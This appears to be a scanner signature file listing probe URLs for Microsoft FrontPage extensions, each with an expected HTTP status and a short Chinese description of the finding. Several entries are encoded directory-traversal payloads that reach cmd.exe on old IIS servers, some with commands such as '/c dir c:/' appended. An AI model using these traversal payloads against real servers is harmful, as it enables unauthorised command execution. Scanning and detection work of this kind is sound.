2698#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#@CGIDIRS/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#通过扫描器可看到web访问日志信息#d9Fa0j#
2699#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#@CGIDIRS/_vti_pvt/doctodep.btr#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#通过扫描器可看到web访问日志信息#d9Fa0j#
3462#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/shtml.dll/_vti_rpc#d9Fa0j#POST#d9Fa0j#The user#d9Fa0j#匿名的FrontPage用户可以构造一个攻击行为的POST请求。#d9Fa0j#
6524#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/__vti_inf.asp#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
6526#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/shtml.dll/nosuch.asp#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
6527#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/default.asp#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
7167#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/_vti_cnf/default.asp#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
8224#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/__vti_inf.aspx#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
8226#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/shtml.dll/nosuch.aspx#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
8796#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/_vti_cnf/default.aspx#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
9202#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/default.aspx#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10662#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/vti_cnf/cmd.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10663#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/vti_bin/cmd.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10667#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_pvt/shtml.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10671#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/vti_bin/cmd1.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10687#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/vti_cnf/cmd1.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10727#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/vti_cnf/sensepost.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10728#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10756#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10757#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10758#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_cnf/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10759#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10760#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_cnf/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10799#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/vti_bin/sensepost.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10800#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/_vti_aut/author.exe#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10945#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_txt/default.htm#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10946#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_txt/_vti_cnf/default.htm#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10948#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/_vti_cnf/default.htm#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10949#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/default.htm#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10970#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/shtml.dll/tstt.htm#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
10987#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/shtml.dll/nosuch.htm#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
11119#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/__vti_inf.html#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
11300#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/shtml.dll/nosuch.jsp#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
11711#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/__vti_inf.jsp#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
11712#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/_vti_cnf/default.jsp#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
11713#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/default.jsp#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
14026#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/__vti_inf.php#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
14028#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/shtml.dll/nosuch.php#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
14572#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/_vti_cnf/default.php#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
14573#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/default.php#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
16150#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\orderinfo.txt#d9Fa0j#GET#d9Fa0j#200#d9Fa0j#发现文件路径信息#d9Fa0j#
18341#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_pvt/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
29334#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/_vti_aut/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
29335#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_log/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
40426#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/_vti_adm/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
49529#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_cnf/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
49642#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
49643#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
49644#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
49645#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#
49800#d9Fa0j#LOW#d9Fa0j#FrontPage扩展#d9Fa0j#/members/_vti_pvt/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#